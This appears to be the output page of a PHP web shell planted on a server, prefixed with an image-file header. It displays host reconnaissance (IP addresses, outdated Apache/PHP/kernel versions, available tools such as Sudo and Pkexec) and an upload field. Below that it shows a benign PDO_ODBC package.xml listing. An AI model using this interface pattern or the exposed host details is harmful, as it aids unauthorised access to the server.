????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.221.83.34 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/pdo_odbc/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.4.2" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>PDO_ODBC</name> <channel>pecl.php.net</channel> <summary>ODBC v3 Interface driver for PDO</summary> <description>This extension provides an ODBC v3 driver for PDO. It supports unixODBC and IBM DB2 libraries, and will support more in future releases. </description> <lead> <name>Wez Furlong</name> <user>wez</user> <email>wez@php.net</email> <active>yes</active> </lead> <date>2006-05-01</date> <version> <release>1.0.1</release> <api>1.0.1</api> </version> <stability> <release>stable</release> <api>stable</api> </stability> <license uri="http://www.php.net/license">PHP</license> <notes> - Fixed bug #35552 (crash when pdo_odbc prepare fails). (Wez). - Fixed bug #36632 (bad error reporting for pdo_odbc exec UPDATE). (Wez). - repackage with package2.xml You require either IBM DB2 CLI libraries or unixODBC to use this package. If you are running on windows, you can download the binary from here: http://pecl4win.php.net/ext.php/php_pdo_odbc.dll </notes> <contents> <dir name="/"> <file name="config.m4" role="src" /> <file name="config.w32" role="src" /> <file name="CREDITS" role="doc" /> <file name="odbc_driver.c" role="src" /> <file name="odbc_stmt.c" role="src" /> <file name="pdo_odbc.c" role="src" /> <file name="php_pdo_odbc.h" role="src" /> <file name="php_pdo_odbc_int.h" role="src" /> </dir> <!-- / --> </contents> <dependencies> <required> <php> <min>5.0.3</min> </php> <pearinstaller> <min>1.4.0</min> </pearinstaller> <package> <name>pdo</name> <channel>pecl.php.net</channel> <min>1.0.3</min> <providesextension>PDO</providesextension> </package> </required> </dependencies> <providesextension>PDO_ODBC</providesextension> <extsrcrelease> <configureoption name="with-pdo-odbc" prompt="flavour,dir? (just leave blank for help)" /> </extsrcrelease> </package>